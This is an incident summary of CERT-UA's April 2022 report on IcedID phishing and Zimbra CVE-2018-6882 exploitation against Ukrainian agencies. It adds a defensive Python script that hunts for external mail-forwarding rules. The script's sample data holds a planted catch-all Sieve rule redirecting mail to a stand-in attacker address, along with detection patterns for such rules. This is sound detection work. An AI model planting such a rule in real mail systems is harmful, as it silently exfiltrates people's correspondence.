Cyber Incident Victim: Computer Emergency Response Team of Ukraine
Date: Apr 2022
Location: Ukraine
Summary
Attackers targeted Ukrainian government agencies in two separate campaigns: one delivered the IcedID banking trojan through macro-enabled Excel documents, the other exploited CVE-2018-6882, a cross-site scripting flaw in the Zimbra Collaboration Suite web client, to plant email forwarding rules for espionage. The Computer Emergency Response Team of Ukraine (CERT-UA) attributed the IcedID campaign to the cluster UAC-0041, previously linked to AgentTesla distribution, and the Zimbra campaign to a previously unknown actor it designated UAC-0097. Both operations aimed to gain a foothold in internal networks for cyber-espionage against critical state institutions. IcedID served as a modular banking trojan for credential theft and as a loader for further malware, while the Zimbra exploit turned the victims' own mail filters into a covert exfiltration channel.
Description
On April 14, 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) reported two distinct cyber campaigns targeting Ukrainian government entities. The first used phishing emails distributing a malicious Excel document titled "Mobilization Register.xls" whose macros downloaded and executed IcedID malware, also known as BankBot. IcedID is a modular banking trojan that harvests credentials and can fetch additional payloads to extend the compromise across the network. CERT-UA attributed this campaign with moderate confidence to the threat cluster UAC-0041, an actor previously associated with distributing AgentTesla. The second campaign used emails carrying an image (JPG) attachment crafted to trigger CVE-2018-6882, a cross-site scripting vulnerability in the Zimbra Collaboration Suite web client that Zimbra patched in 2018; when the recipient viewed the message in the web client, the injected script created a mail filter that forwarded the victim's incoming email to an attacker-controlled address. The goal was to intercept sensitive communications without further interaction with the mailbox. CERT-UA assigned this activity to a previously unidentified group designated UAC-0097.

Both operations sought unauthorized access to internal government networks for cyber-espionage against critical Ukrainian agencies. The IcedID campaign relied on social engineering, using a document name that implied relevance to military mobilization, while the Zimbra campaign relied on unpatched installations to redirect email traffic silently. CERT-UA assessed that the objectives were persistent access and intelligence collection rather than disruption. In response to the Zimbra exploitation, CERT-UA advised organizations to apply the security updates that address CVE-2018-6882. Patching alone does not undo a forwarding rule the attacker has already created, so affected organizations also need to review existing mail filters and forwarding settings for unexpected external recipients. The incidents are typical of the sustained malicious cyber operations against Ukrainian infrastructure during the 2022 Russian invasion, with attribution confidence varying according to how closely the tactics overlapped with known threat actor patterns.
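The following script is an added example, not code from CERT-UA or from Zimbra, showing how an administrator can hunt for the forwarding rules this campaign planted. Zimbra stores each user's mail filters as a Sieve script in the LDAP attribute zimbraMailSieveScript and account-level forwarding in zimbraPrefMailForwardingAddress; both can be dumped with `zmprov ga <account> zimbraMailSieveScript zimbraPrefMailForwardingAddress`. The script parses that dump, pulls out every Sieve `redirect` target and forwarding address, and reports those pointing outside the organization's own domains. The sample dump and all domains and account names in it are constructed for illustration and are not real incident data.

```python
"""Hunt for unauthorized mail-forwarding rules in Zimbra account dumps.

Added example, not CERT-UA or Zimbra code. Feed it the concatenated output of
  zmprov -l gaa | while read a; do
      zmprov ga "$a" zimbraMailSieveScript zimbraPrefMailForwardingAddress; done
and it reports accounts that redirect mail to external addresses.
"""
import re
from typing import Dict, Iterable, List

# Sieve redirect action, with optional tagged arguments such as ":copy".
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:\w+)*\s+"([^"]+)"', re.IGNORECASE)
# `zmprov ga` starts each account block with "# name user@domain".
ACCOUNT_RE = re.compile(r'^# name (\S+)', re.MULTILINE)
# Account-level forwarding attribute; Zimbra stores a comma-separated list.
FWD_ATTR_RE = re.compile(r'^zimbraPrefMailForwardingAddress:\s*(.+)$', re.MULTILINE)

# Constructed sample dump (assumed shape of zmprov output; hypothetical accounts).
SAMPLE_ZMPROV_OUTPUT = """\
# name analyst@example.gov.ua
zimbraMailSieveScript: require ["fileinto", "copy"];
# rule1
if anyof (header :contains "subject" "report") {
    fileinto "Reports";
}
# rule2
if true {
    redirect :copy "collector@attacker.example";
}

# name clerk@example.gov.ua
zimbraMailSieveScript: require ["fileinto"];
if anyof (header :contains "from" "hr@example.gov.ua") {
    fileinto "HR";
    redirect "shared-hr@example.gov.ua";
}
zimbraPrefMailForwardingAddress: archive@mail.example.gov.ua

# name deputy@example.gov.ua
zimbraPrefMailForwardingAddress: deputy.personal@webmail.example
"""


def split_accounts(zmprov_output: str) -> Dict[str, str]:
    """Split a concatenated zmprov dump into {account: attribute text}."""
    accounts: Dict[str, str] = {}
    headers = list(ACCOUNT_RE.finditer(zmprov_output))
    for i, m in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(zmprov_output)
        accounts[m.group(1)] = zmprov_output[m.end():end]
    return accounts


def forwarding_targets(account_text: str) -> List[str]:
    """All addresses an account forwards to: Sieve redirects plus the pref attribute."""
    targets = REDIRECT_RE.findall(account_text)
    for value in FWD_ATTR_RE.findall(account_text):
        targets += [addr.strip() for addr in value.split(",") if addr.strip()]
    return targets


def is_external(address: str, internal_domains: Iterable[str]) -> bool:
    """True if the address domain is not one of (or a subdomain of) our domains."""
    domain = address.rsplit("@", 1)[-1].lower()
    return not any(domain == d or domain.endswith("." + d) for d in internal_domains)


def audit(zmprov_output: str, internal_domains: Iterable[str]) -> Dict[str, List[str]]:
    """Return {account: [external forwarding targets]} for accounts leaking mail."""
    internal = [d.lower() for d in internal_domains]
    findings: Dict[str, List[str]] = {}
    for account, text in split_accounts(zmprov_output).items():
        external = [t for t in forwarding_targets(text) if is_external(t, internal)]
        if external:
            findings[account] = external
    return findings


if __name__ == "__main__":
    for account, targets in audit(SAMPLE_ZMPROV_OUTPUT, ["example.gov.ua"]).items():
        print(f"{account}: forwards to {', '.join(targets)}")
```

A catch-all rule such as `if true { redirect ... }` on a mailbox that never had filters before is the pattern to look for first; internal redirects (the clerk account above) are filtered out so the report stays short enough to act on.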
